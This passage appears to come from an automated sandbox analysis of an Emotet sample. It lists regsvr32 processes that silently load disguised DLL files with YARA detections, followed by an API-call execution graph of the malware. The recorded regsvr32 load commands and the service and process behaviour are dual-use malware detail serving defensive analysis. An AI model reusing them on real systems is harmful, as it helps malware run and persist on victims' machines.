                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:13:53:35
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:13:53:39
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.457498778.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:13:53:41
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462225822.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462181637.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:13:53:43
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467760078.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.467692271.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:9
                                                                                                              Start time:13:53:46
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.472981981.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:13:53:49
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.482238250.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:13:53:53
                                                                                                              Start date:24/02/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
                                                                                                              Imagebase:0xfc0000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.8%
                                                                                                                Dynamic/Decrypted Code Coverage:42.4%
                                                                                                                Signature Coverage:34.7%
                                                                                                                Total number of Nodes:568
                                                                                                                Total number of Limit Nodes:26
                                                                                                                execution_graph 44537 100081b0 VirtualAlloc 44538 10008b40 CreateWindowExW 44539 10008b74 GetLastError 44538->44539 44540 10008b7a ShowWindow CreateWindowExA 44538->44540 44539->44540 44541 10008bc1 44540->44541 44542 10008bbb ShowWindow 44540->44542 44543 10008bd2 44541->44543 44544 10008bcb ExitProcess 44541->44544 44542->44541 44549 10008380 44543->44549 44550 1000842d 44549->44550 44554 100084eb 44549->44554 44551 100087a1 bsearch 44550->44551 44552 10008572 malloc 44550->44552 44550->44554 44551->44554 44553 1000867b qsort 44552->44553 44552->44554 44553->44551 44556 1c25d1 44554->44556 44561 1a50cf 44556->44561 44558 1c2661 44597 1b7b25 44558->44597 44560 1c2675 44590 1a638d 44561->44590 44563 1a6c56 44709 1acde0 6 API calls 44563->44709 44567 1a6c46 44567->44558 44573 1b8ef8 GetPEB RtlAllocateHeap 44573->44590 44576 1b17d2 GetPEB 44576->44590 44588 1b34da GetPEB RtlAllocateHeap 44588->44590 44590->44563 44590->44567 44590->44573 44590->44576 44590->44588 44593 1bf94b GetPEB 44590->44593 44600 1c0e7a 44590->44600 44608 1a9af8 44590->44608 44612 1a8844 44590->44612 44622 1a9c1b 44590->44622 44635 1c13a3 44590->44635 44646 1a82d2 44590->44646 44656 1b416e 44590->44656 44670 1b8131 44590->44670 44682 1bfecb 44590->44682 44691 1b1a83 GetPEB RtlAllocateHeap 44590->44691 44692 1beec2 GetPEB RtlAllocateHeap 44590->44692 44693 1a79cc GetPEB 44590->44693 44694 1b8966 GetPEB RtlAllocateHeap 44590->44694 44695 1c0a01 6 API calls 44590->44695 44696 1b9285 GetPEB 44590->44696 44697 1bfad1 GetPEB 44590->44697 44698 1aa9cf GetPEB RtlAllocateHeap 44590->44698 44699 1c26fc GetPEB 44590->44699 44700 1c1fc7 GetPEB RtlAllocateHeap 44590->44700 44701 1a8ee5 GetPEB RtlAllocateHeap 44590->44701 44702 1bd4ae GetPEB SHGetFolderPathW RtlAllocateHeap 44590->44702 44703 1aae33 GetPEB 44590->44703 44704 1b604b GetPEB CloseHandle 44590->44704 44705 1b26f3 GetPEB 44590->44705 44706 1ae65a GetPEB RtlAllocateHeap 44590->44706 44707 1b3231 GetPEB RtlAllocateHeap 44590->44707 44708 1bd15e GetPEB OpenSCManagerW OpenServiceW CloseServiceHandle 44590->44708 44593->44590 44598 1a7f78 GetPEB 44597->44598 44599 1b7b93 ExitProcess 44598->44599 44599->44560 44601 1c11a2 44600->44601 44604 1c12e6 44601->44604 44710 1b91cc 44601->44710 44714 1b02d8 44601->44714 44718 1ba50a 44601->44718 44722 1c0575 GetPEB 44601->44722 44723 1c2545 GetPEB 44601->44723 44604->44590 44610 1a9b12 44608->44610 44609 1c1e49 GetPEB RtlAllocateHeap LoadLibraryW 44609->44610 44610->44609 44611 1a9c05 44610->44611 44611->44590 44614 1a8b4a 44612->44614 44617 1a8c94 44614->44617 44621 1a8c92 44614->44621 44732 1a3466 44614->44732 44736 1a6e01 44614->44736 44740 1bed7b 44614->44740 44744 1a303a 44614->44744 44749 1a7761 GetPEB 44614->44749 44750 1c0575 GetPEB 44617->44750 44621->44590 44625 1aa250 44622->44625 44624 1bed7b 2 API calls 44624->44625 44625->44624 44627 1a6e01 2 API calls 44625->44627 44628 1aa4b4 44625->44628 44629 1aa4b2 44625->44629 44633 1a3466 2 API calls 44625->44633 44758 1a364e 44625->44758 44769 1b9862 GetPEB 44625->44769 44770 1bf5d9 44625->44770 44774 1ad467 GetPEB 44625->44774 44775 1bf94b 44625->44775 44627->44625 44632 1bed7b 2 API calls 44628->44632 44629->44590 44632->44629 44633->44625 44636 1c17ea 44635->44636 44637 1c19e8 44636->44637 44640 1c19e6 44636->44640 44642 1ba50a 2 API calls 44636->44642 44643 1bf5d9 2 API calls 44636->44643 44645 1bf94b GetPEB 44636->44645 44797 1beab3 44636->44797 44801 1b8eb3 GetPEB 44636->44801 44802 1c2545 GetPEB 44636->44802 44639 1b02d8 2 API calls 44637->44639 44639->44640 44640->44590 44642->44636 44643->44636 44645->44636 44649 1a855b 44646->44649 44647 1bf5d9 2 API calls 44647->44649 44648 1a8648 44817 1a8fe9 44648->44817 44649->44647 44649->44648 44653 1a8646 44649->44653 44654 1bf94b GetPEB 44649->44654 44803 1a4b40 44649->44803 44827 1c0575 GetPEB 44649->44827 44828 1b8eb3 GetPEB 44649->44828 44653->44590 44654->44649 44662 1b468e 44656->44662 44659 1bf5d9 2 API calls 44659->44662 44660 1b46c9 44661 1b17d2 GetPEB 44660->44661 44665 1b46df 44661->44665 44662->44659 44662->44660 44663 1b4876 44662->44663 44666 1a303a GetPEB RtlAllocateHeap 44662->44666 44668 1bf94b GetPEB 44662->44668 44860 1ad2c9 44662->44860 44864 1a9291 44662->44864 44868 1b2519 GetPEB 44662->44868 44663->44663 44667 1b17d2 GetPEB 44665->44667 44666->44662 44669 1b46f2 44667->44669 44668->44662 44669->44590 44869 1b1919 44670->44869 44673 1b85ac 44675 1a4b40 2 API calls 44673->44675 44674 1bf5d9 GetPEB RtlAllocateHeap 44681 1b857d 44674->44681 44678 1b85cb 44675->44678 44676 1b86e9 44676->44676 44678->44590 44680 1bf94b GetPEB 44680->44681 44681->44673 44681->44674 44681->44676 44681->44680 44872 1b8eb3 GetPEB 44681->44872 44873 1acca2 GetPEB 44681->44873 44874 1ad467 GetPEB 44681->44874 44690 1bfee5 44682->44690 44684 1bf5d9 GetPEB RtlAllocateHeap 44684->44690 44685 1c0568 44685->44590 44687 1a3466 2 API calls 44687->44690 44689 1bf94b GetPEB 44689->44690 44690->44684 44690->44685 44690->44687 44690->44689 44875 1b4e54 44690->44875 44885 1ad467 GetPEB 44690->44885 44886 1c224c GetPEB 44690->44886 44691->44590 44692->44590 44693->44590 44694->44590 44695->44590 44696->44590 44697->44590 44698->44590 44699->44590 44700->44590 44701->44590 44702->44590 44703->44590 44704->44590 44705->44590 44706->44590 44707->44590 44708->44590 44709->44567 44711 1b91ec 44710->44711 44724 1a7f78 44711->44724 44715 1b02ee 44714->44715 44716 1a7f78 GetPEB 44715->44716 44717 1b0380 CloseHandle 44716->44717 44717->44601 44719 1ba53c 44718->44719 44720 1a7f78 GetPEB 44719->44720 44721 1ba5d0 CreateFileW 44720->44721 44721->44601 44722->44601 44723->44601 44725 1a8055 44724->44725 44726 1a8032 44724->44726 44725->44601 44730 1a806b GetPEB 44726->44730 44728 1a8040 44731 1b66c8 GetPEB 44728->44731 44730->44728 44731->44725 44733 1a348b 44732->44733 44734 1a7f78 GetPEB 44733->44734 44735 1a34f4 SHGetFolderPathW 44734->44735 44735->44614 44737 1a6e19 44736->44737 44738 1a7f78 GetPEB 44737->44738 44739 1a6ea5 OpenSCManagerW 44738->44739 44739->44614 44741 1bed91 44740->44741 44742 1a7f78 GetPEB 44741->44742 44743 1bee09 CloseServiceHandle 44742->44743 44743->44614 44751 1b345b 44744->44751 44748 1a3122 44748->44614 44749->44614 44750->44621 44752 1a7f78 GetPEB 44751->44752 44753 1a310a 44752->44753 44754 1a3506 44753->44754 44755 1a3522 44754->44755 44756 1a7f78 GetPEB 44755->44756 44757 1a359f RtlAllocateHeap 44756->44757 44757->44748 44767 1a3678 44758->44767 44760 1b17d2 GetPEB 44760->44767 44764 1a3df0 44764->44625 44765 1a303a GetPEB RtlAllocateHeap 44765->44767 44766 1bed7b 2 API calls 44766->44767 44767->44760 44767->44764 44767->44765 44767->44766 44779 1a8e38 44767->44779 44783 1acd1c GetPEB 44767->44783 44784 1b640e GetPEB 44767->44784 44785 1a32b3 GetPEB 44767->44785 44786 1acca2 GetPEB 44767->44786 44769->44625 44771 1bf5f3 44770->44771 44772 1a303a 2 API calls 44771->44772 44773 1bf6bd 44772->44773 44773->44625 44773->44773 44774->44625 44776 1bf960 44775->44776 44787 1b17d2 44776->44787 44780 1a8e54 44779->44780 44781 1a7f78 GetPEB 44780->44781 44782 1a8ed4 OpenServiceW 44781->44782 44782->44767 44783->44767 44784->44767 44785->44767 44786->44767 44788 1b17e2 44787->44788 44789 1b345b GetPEB 44788->44789 44790 1b18fd 44789->44790 44793 1a6f64 44790->44793 44794 1a6f81 44793->44794 44795 1a7f78 GetPEB 44794->44795 44796 1a7002 44795->44796 44796->44625 44798 1bead4 44797->44798 44799 1a7f78 GetPEB 44798->44799 44800 1beb4e SetFileInformationByHandle 44799->44800 44800->44636 44801->44636 44802->44636 44804 1a4b5a 44803->44804 44829 1b25cd 44804->44829 44807 1b25cd GetPEB 44808 1a4dff 44807->44808 44809 1b25cd GetPEB 44808->44809 44810 1a4e15 44809->44810 44833 1a91f2 44810->44833 44813 1a91f2 GetPEB 44814 1a4e4c 44813->44814 44837 1b7da0 44814->44837 44816 1a4e81 44816->44649 44818 1a9003 44817->44818 44819 1bf5d9 2 API calls 44818->44819 44820 1a91a5 44819->44820 44849 1c1c9b 44820->44849 44823 1bf94b GetPEB 44824 1a91d7 44823->44824 44853 1a7bc6 44824->44853 44826 1a91e9 44826->44653 44827->44649 44828->44649 44830 1b25e3 44829->44830 44841 1a218f 44830->44841 44834 1a920b 44833->44834 44835 1a7f78 GetPEB 44834->44835 44836 1a4e30 44835->44836 44836->44813 44838 1b7db3 44837->44838 44839 1a7f78 GetPEB 44838->44839 44840 1b7e32 SHFileOperationW 44839->44840 44840->44816 44842 1a21a7 44841->44842 44845 1a7b24 44842->44845 44846 1a7b3c 44845->44846 44847 1a7f78 GetPEB 44846->44847 44848 1a221a 44847->44848 44848->44807 44850 1c1cba 44849->44850 44857 1aadb7 44850->44857 44854 1a7bd6 44853->44854 44855 1a7f78 GetPEB 44854->44855 44856 1a7c6e DeleteFileW 44855->44856 44856->44826 44858 1a7f78 GetPEB 44857->44858 44859 1a91c4 44858->44859 44859->44823 44861 1ad2ee 44860->44861 44862 1a7f78 GetPEB 44861->44862 44863 1ad34d 44862->44863 44863->44662 44865 1a92b3 44864->44865 44866 1a7f78 GetPEB 44865->44866 44867 1a932f 44866->44867 44867->44662 44868->44662 44870 1a7f78 GetPEB 44869->44870 44871 1b19a8 44870->44871 44871->44681 44872->44681 44873->44681 44874->44681 44876 1b4e7d 44875->44876 44877 1b25cd GetPEB 44876->44877 44878 1b504f 44877->44878 44887 1a816b 44878->44887 44880 1b508e 44881 1b5099 44880->44881 44882 1b02d8 2 API calls 44880->44882 44881->44690 44883 1b50b6 44882->44883 44884 1b02d8 2 API calls 44883->44884 44884->44881 44885->44690 44886->44690 44888 1a81a6 44887->44888 44889 1a7f78 GetPEB 44888->44889 44890 1a8221 CreateProcessW 44889->44890 44890->44880 44891 100081d0 VirtualFree 44892 1003d1af 44893 1003d1b6 44892->44893 44894 1003d1bb 44892->44894 44910 10048cd7 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 44893->44910 44898 1003d0b9 44894->44898 44897 1003d1cc 44901 1003d0c5 ___crtInitCritSecAndSpinCount 44898->44901 44899 1003d112 44900 1003d162 ___crtInitCritSecAndSpinCount 44899->44900 44965 10009db0 44899->44965 44900->44897 44901->44899 44901->44900 44911 1003cee0 44901->44911 44904 1003d125 44906 10009db0 ___DllMainCRTStartup 140 API calls 44904->44906 44909 1003d142 44904->44909 44905 1003cee0 __CRT_INIT@12 166 API calls 44905->44900 44907 1003d139 44906->44907 44908 1003cee0 __CRT_INIT@12 166 API calls 44907->44908 44908->44909 44909->44900 44909->44905 44910->44894 44912 1003cef3 GetProcessHeap HeapAlloc 44911->44912 44913 1003d00a 44911->44913 44914 1003cf17 GetVersionExA 44912->44914 44942 1003cf10 44912->44942 44915 1003d010 44913->44915 44916 1003d045 44913->44916 44917 1003cf32 GetProcessHeap HeapFree 44914->44917 44918 1003cf27 GetProcessHeap HeapFree 44914->44918 44923 1003d02f 44915->44923 44915->44942 45080 10040e1e 44915->45080 44919 1003d0a3 44916->44919 44920 1003d04a 44916->44920 44921 1003cf5e 44917->44921 44918->44942 44919->44942 45122 10042c5c 81 API calls 2 library calls 44919->45122 45092 1004296c 7 API calls __decode_pointer 44920->45092 44994 10043e29 HeapCreate 44921->44994 44923->44942 45089 10048658 70 API calls __getdrive 44923->45089 44925 1003d04f 45093 10046749 44925->45093 44930 1003cf94 44930->44942 45004 10042cc5 GetModuleHandleA 44930->45004 44931 1003d039 45090 100429af 72 API calls 2 library calls 44931->45090 44935 1003d03e 45091 10043e83 VirtualFree HeapFree HeapFree HeapDestroy 44935->45091 44937 1003cfa2 __RTC_Initialize 44938 1003cfa6 44937->44938 44943 1003cfb5 GetCommandLineA 44937->44943 45083 10043e83 VirtualFree HeapFree HeapFree HeapDestroy 44938->45083 44942->44899 45037 100489d0 44943->45037 44944 1003d080 45108 100429ec 69 API calls 4 library calls 44944->45108 44945 1003d097 45109 1003b59d 44945->45109 44950 1003d087 GetCurrentThreadId 44950->44942 44952 1003cfcf 44953 1003cfd3 44952->44953 44954 1003cfda 44952->44954 45084 100429af 72 API calls 2 library calls 44953->45084 45085 10048917 113 API calls 3 library calls 44954->45085 44957 1003cfdf 44958 1003cff3 44957->44958 45086 100486a4 112 API calls 6 library calls 44957->45086 44964 1003cff8 44958->44964 45088 10048658 70 API calls __getdrive 44958->45088 44961 1003cfe8 44961->44958 45087 10040cad 76 API calls 3 library calls 44961->45087 44962 1003d008 44962->44953 44964->44942 44966 10009dd6 CreateWindowExW 44965->44966 44993 1000a25a 44965->44993 44968 10009e10 ShowWindow CreateWindowExA 44966->44968 44969 10009e0a GetLastError 44966->44969 44971 10009e4a ShowWindow 44968->44971 44972 10009e4e 44968->44972 44969->44968 44970 1000a284 44970->44904 44971->44972 45187 10008af0 44972->45187 44974 10009e53 44975 1000a28a 44974->44975 44976 10009e5b CreateWindowExW 44974->44976 45198 1003be3f 107 API calls 7 library calls 44975->45198 44978 10009fa1 GetLastError 44976->44978 44979 10009fa7 ShowWindow CreateWindowExA 44976->44979 44978->44979 44980 10009fdb ShowWindow 44979->44980 44984 10009fdf ___DllMainCRTStartup 44979->44984 44980->44984 44981 1000a294 45199 1003b437 5 API calls __invoke_watson 44981->45199 44983 1000a2a7 44983->44904 44985 1000a177 FindResourceW LoadResource SizeofResource 44984->44985 44986 1000a1b2 44985->44986 44987 1000a20c VirtualAlloc 44985->44987 44988 1000a21b memcpy malloc 44986->44988 44987->44988 45196 10006020 malloc ??3@YAXPAX 44988->45196 44990 1000a244 ___DllMainCRTStartup 44991 1000a24c ??3@YAXPAX 44990->44991 45193 10009d80 44991->45193 45197 1003b437 5 API calls __invoke_watson 44993->45197 44995 10043e4c 44994->44995 44996 10043e49 44994->44996 45123 10043dce 69 API calls 3 library calls 44995->45123 44996->44930 44998 10043e51 44999 10043e7f 44998->44999 45000 10043e5b 44998->45000 44999->44930 45124 100432cf HeapAlloc 45000->45124 45002 10043e65 45002->44999 45003 10043e6a HeapDestroy 45002->45003 45003->44996 45005 10042cd7 45004->45005 45006 10042ce0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45004->45006 45125 100429af 72 API calls 2 library calls 45005->45125 45007 10042d2a TlsAlloc 45006->45007 45011 10042e44 45007->45011 45012 10042d78 TlsSetValue 45007->45012 45009 10042cdc 45009->44937 45011->44937 45012->45011 45013 10042d89 45012->45013 45126 10040e2d 5 API calls 2 library calls 45013->45126 45015 10042d8e 45127 10042879 TlsGetValue 45015->45127 45018 10042879 __encode_pointer 5 API calls 45019 10042da9 45018->45019 45020 10042879 __encode_pointer 5 API calls 45019->45020 45021 10042db9 45020->45021 45022 10042879 __encode_pointer 5 API calls 45021->45022 45023 10042dc9 45022->45023 45136 10043128 69 API calls ___crtInitCritSecAndSpinCount 45023->45136 45025 10042dd6 45026 10042e3f 45025->45026 45028 100428e5 __decode_pointer 5 API calls 45025->45028 45138 100429af 72 API calls 2 library calls 45026->45138 45029 10042dea 45028->45029 45029->45026 45030 10046749 __calloc_crt 69 API calls 45029->45030 45031 10042e03 45030->45031 45031->45026 45032 100428e5 __decode_pointer 5 API calls 45031->45032 45033 10042e1d 45032->45033 45033->45026 45034 10042e24 45033->45034 45137 100429ec 69 API calls 4 library calls 45034->45137 45036 10042e2c GetCurrentThreadId 45036->45011 45038 100489ec GetEnvironmentStringsW 45037->45038 45039 10048a0b 45037->45039 45041 100489f4 45038->45041 45042 10048a00 GetLastError 45038->45042 45040 10048aa6 45039->45040 45039->45041 45043 10048aae GetEnvironmentStrings 45040->45043 45046 1003cfc5 45040->45046 45044 10048a35 WideCharToMultiByte 45041->45044 45045 10048a26 GetEnvironmentStringsW 45041->45045 45042->45039 45043->45046 45051 10048abe 45043->45051 45049 10048a69 45044->45049 45050 10048a9b FreeEnvironmentStringsW 45044->45050 45045->45044 45045->45046 45063 10048418 45046->45063 45139 10046709 69 API calls _malloc 45049->45139 45050->45046 45140 10046709 69 API calls _malloc 45051->45140 45054 10048ad7 45056 10048ade FreeEnvironmentStringsA 45054->45056 45057 10048aea _realloc 45054->45057 45055 10048a6f 45055->45050 45058 10048a78 WideCharToMultiByte 45055->45058 45056->45046 45061 10048af2 FreeEnvironmentStringsA 45057->45061 45059 10048a92 45058->45059 45060 10048a89 45058->45060 45059->45050 45062 1003b59d __getdrive 69 API calls 45060->45062 45061->45046 45062->45059 45141 1003d578 45063->45141 45065 10048424 GetStartupInfoA 45066 10046749 __calloc_crt 69 API calls 45065->45066 45074 10048445 45066->45074 45067 1004864f ___crtInitCritSecAndSpinCount 45067->44952 45068 100485cc GetStdHandle 45073 10048596 45068->45073 45069 10046749 __calloc_crt 69 API calls 45069->45074 45070 10048631 SetHandleCount 45070->45067 45071 100485de GetFileType 45071->45073 45072 10048519 45072->45073 45076 10048542 GetFileType 45072->45076 45077 1004854d 45072->45077 45073->45068 45073->45070 45073->45071 45079 100485f5 45073->45079 45074->45067 45074->45069 45074->45072 45074->45073 45076->45072 45076->45077 45077->45067 45077->45072 45142 1004a088 69 API calls 4 library calls 45077->45142 45079->45067 45079->45073 45143 1004a088 69 API calls 4 library calls 45079->45143 45144 10040d3f 45080->45144 45082 10040e29 45082->44923 45083->44942 45084->44938 45085->44957 45086->44961 45087->44958 45088->44962 45089->44931 45090->44935 45091->44942 45092->44925 45095 1004674d 45093->45095 45096 1003d05b 45095->45096 45097 1004676d Sleep 45095->45097 45164 1003c6e3 45095->45164 45096->44942 45099 100428e5 TlsGetValue 45096->45099 45098 10046782 45097->45098 45098->45095 45098->45096 45100 100428f8 45099->45100 45101 10042919 GetModuleHandleA 45099->45101 45100->45101 45102 10042902 TlsGetValue 45100->45102 45103 1003d079 45101->45103 45104 10042928 GetProcAddress 45101->45104 45106 1004290d 45102->45106 45103->44944 45103->44945 45105 10042911 45104->45105 45105->45103 45107 10042938 RtlDecodePointer 45105->45107 45106->45101 45106->45105 45107->45103 45108->44950 45111 1003b5a9 ___crtInitCritSecAndSpinCount 45109->45111 45110 1003b622 ___crtInitCritSecAndSpinCount _realloc 45110->44942 45111->45110 45112 1003b5e8 45111->45112 45183 1004329e 69 API calls 2 library calls 45111->45183 45112->45110 45113 1003b5fd HeapFree 45112->45113 45113->45110 45115 1003b60f 45113->45115 45186 1003d47e 69 API calls __getptd_noexit 45115->45186 45117 1003b614 GetLastError 45117->45110 45118 1003b5c0 ___sbh_find_block 45121 1003b5da 45118->45121 45184 10043342 VirtualFree VirtualFree HeapFree __VEC_memcpy __fptostr 45118->45184 45185 1003b5f3 LeaveCriticalSection _doexit 45121->45185 45122->44942 45123->44998 45124->45002 45125->45009 45126->45015 45128 1004288c 45127->45128 45129 100428ad GetModuleHandleA 45127->45129 45128->45129 45132 10042896 TlsGetValue 45128->45132 45130 100428d6 45129->45130 45131 100428bc GetProcAddress 45129->45131 45130->45018 45133 100428a5 45131->45133 45134 100428a1 45132->45134 45133->45130 45135 100428cc RtlEncodePointer 45133->45135 45134->45129 45134->45133 45135->45130 45136->45025 45137->45036 45138->45011 45139->45055 45140->45054 45141->45065 45142->45077 45143->45079 45145 10040d4b ___crtInitCritSecAndSpinCount 45144->45145 45160 1004329e 69 API calls 2 library calls 45145->45160 45147 10040d52 45148 10040d8e _doexit 45147->45148 45150 100428e5 __decode_pointer 5 API calls 45147->45150 45161 10040df8 LeaveCriticalSection _doexit 45148->45161 45152 10040d81 45150->45152 45151 10040dd9 45153 10040ddf 45151->45153 45156 10040e07 ___crtInitCritSecAndSpinCount 45151->45156 45154 100428e5 __decode_pointer 5 API calls 45152->45154 45162 100431c6 LeaveCriticalSection 45153->45162 45154->45148 45156->45082 45157 10040dec 45163 10040bdb GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 45157->45163 45160->45147 45161->45151 45162->45157 45165 1003c6ef ___crtInitCritSecAndSpinCount 45164->45165 45166 1003c707 45165->45166 45176 1003c726 _memset 45165->45176 45177 1003d47e 69 API calls __getptd_noexit 45166->45177 45168 1003c70c 45178 10041bcb 5 API calls 2 library calls 45168->45178 45169 1003c798 RtlAllocateHeap 45169->45176 45173 1003c71c ___crtInitCritSecAndSpinCount 45173->45095 45176->45169 45176->45173 45179 1004329e 69 API calls 2 library calls 45176->45179 45180 10043aeb 5 API calls 2 library calls 45176->45180 45181 1003c7df LeaveCriticalSection _doexit 45176->45181 45182 100440da 5 API calls __decode_pointer 45176->45182 45177->45168 45179->45176 45180->45176 45181->45176 45182->45176 45183->45118 45184->45121 45185->45112 45186->45117 45200 1003b4da 45187->45200 45189 